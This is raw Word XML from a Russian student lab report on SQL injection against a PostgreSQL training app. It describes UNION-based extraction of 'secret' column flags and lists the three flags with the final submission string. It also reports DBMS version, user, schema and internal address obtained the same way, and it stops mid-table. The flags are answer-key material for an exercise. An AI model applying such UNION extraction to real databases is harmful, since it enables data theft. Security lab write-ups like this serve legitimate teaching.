    <w:p w14:paraId="7D576B98" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC79BEF" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Для извлечения флагов был сформирован объединенный запрос, который последовательно выбирал непустые значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> из пользовательских таблиц. Чтобы избежать проблем с символом % в psycopg2, фильтрация по подстроке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ibks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> была выполнена через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ibks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)) &gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5E117" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D2DB4E4" wp14:editId="0D8190AF">
            <wp:extent cx="5832000" cy="2125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8_secret.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="2125932"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588EADA" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 8 – Получение трех флагов из колонок </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40A66937" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 13 – Найденные флаги</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3402"/>
        <w:gridCol w:w="6493"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="4AB33613" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B1F296A" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Источник</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6493" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05849776" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Флаг</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="4337CAA7" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="582E572F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>user_personal_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>info.secret</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6493" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D38F94" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>ibks1_{653b6e69e46c8}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="7506B6DB" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E6630C0" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>products.secret</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6493" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4169058D" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>ibks2_{9a7d9c2fcbeaf}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="3A91EE67" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DA1D816" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>reviews.secret</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6493" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64EB8674" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>ibks3_{93f8739c36549}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B73AC3B" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="6FA2F97F" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Согласно условию лабораторной работы итоговый ответ формируется в порядке ibks1, ibks2, ibks3 без префиксов и фигурных скобок. Поэтому итоговая строка ответа была составлена как secret_653b6e69e46c89a7d9c2fcbeaf93f8739c36549.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5BDFC" w14:textId="1C3E5986" w:rsidR="00223005" w:rsidRPr="00C2601B" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Листинг 6 – Итоговый ответ для сдачи</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w:rsidRPr="00C2601B" w14:paraId="450FE0C2" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F463FF0" w14:textId="121C9B29" w:rsidR="00223005" w:rsidRPr="00B02A76" w:rsidRDefault="00223005" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:t>secret_653b6e69e46c89a7d9c2fcbeaf93f8739c36549</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BDFEDE2" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317431BA" w14:textId="3963271A" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Через тот же UNION-канал были получены характеристики сервера СУБД. Это показывает, что уязвимость позволила выйти за пределы обычной бизнес-логики приложения и получить системную информацию о </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A484E9" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9834CF" wp14:editId="702EBB9E">
            <wp:extent cx="5832000" cy="1483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9_PostgreSQL_version_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1483414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8BBE67" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 9 – Получение версии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F145481" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE0951C" wp14:editId="01C51EA1">
            <wp:extent cx="5832000" cy="1506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0_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1506977"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA9F98" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 10 – Получение имени БД, пользователя и схемы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C6697" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305048ED" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC9760A" w14:textId="239899C8" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve">Таблица 14 – Сведения о сервере </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3650"/>
        <w:gridCol w:w="6236"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="7A30188E" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21C24616" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35077569" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="520C02A6" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222AF081" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Версия СУБД</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64595483" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 15.12 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Debian</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 15.12-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>1.pgdg</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>120+1), 64-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="0D72A179" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31CE8B13" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>База данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BBA198A" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>281597ea_a798_410d_9e81_43bb6b4ce978</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="772AA0A1" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01A94660" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Пользователь БД</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55FD72D1" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>sqli_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="55DDFF1A" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39612A96" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Схема</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FAB9E1F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="635DBB77" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40905B3E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Адрес сервера БД</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D092858" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>172.18.0.6/32:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="5A8C6745" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
